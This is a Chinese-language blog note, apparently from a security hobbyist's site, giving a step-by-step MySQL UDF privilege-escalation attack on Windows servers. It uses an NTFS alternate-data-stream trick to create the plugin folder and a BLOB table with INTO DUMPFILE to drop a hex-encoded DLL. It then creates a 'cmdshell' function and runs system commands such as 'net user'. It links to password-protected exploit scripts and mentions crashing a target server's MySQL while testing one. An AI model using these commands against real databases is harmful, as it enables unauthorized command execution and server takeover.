udf提权笔记(及脚本下载)
首页 > web安全 > 小技巧    作者:webbaozi   2016年12月7日 21:41 星期三   热度:2266°   百度已收录  
时间:2016-12-7 21:41   热度:2266° 

mysql版本大于5.1

1.使用select @@basedir(select @@datadir)查询mysql安装目录

当sehll没有mysql目录操作权限时,利用ADS创建\lib\plugin目录

查询 select 'xxx' into dumpfile 'C:\\MySQL\\lib::$INDEX_ALLOCATION';
此时会报错
ERROR 3 (HY000): Error writing file 'C:\MySQL\lib::$INDEX_ALLOCATION' (Errcode: 22)
但是lib这个目录已经创建好了。

同理

查询 select 'xxx' into dumpfile 'C:\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';

创建plugin目录。

然后使用脚本去导出udf.dll就行了。

如果没有shell,只是有sql权限那就使用如下方法

查询 CREATE TABLE Temp_udf(udf BLOB);
查询 INSERT into Temp_udf values (CONVERT($shellcode,CHAR));   //$shellcode请用UDF用hex加密后的代码
查询 SELECT udf FROM Temp_udf INTO DUMPFILE 'C:\\MySQL\\lib\\plugin\\udf.dll';--

接下来就是提权,命令如下:

提权
查询 Create function cmdshell returns string soname 'udf.dll';  //此处不能填绝对路径 只能是dll名
查询 select * from mysql.func;                  //看看cmdshell function是否创立,创立就继续
查询 select cmdshell('net user');               //运行各种命令提权
链接: udf提权脚本 密码: 6666

链接: udf提权源码 密码: 6666

(注:可参考90这篇文章使用api添加用户)

ps:其中在测试mysql全版本通杀提权.zip这个脚本时,目标服务器的mysql会挂掉。本地未测,请自行测试。

二维码加载中...
本文作者:webbaozi      文章标题: udf提权笔记(及脚本下载)
本文地址:http://www.webbaozi.com/qjyq/28.html
版权声明:若无注明,本文皆为“baozi|学与用”原创,转载请保留文章出处。

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1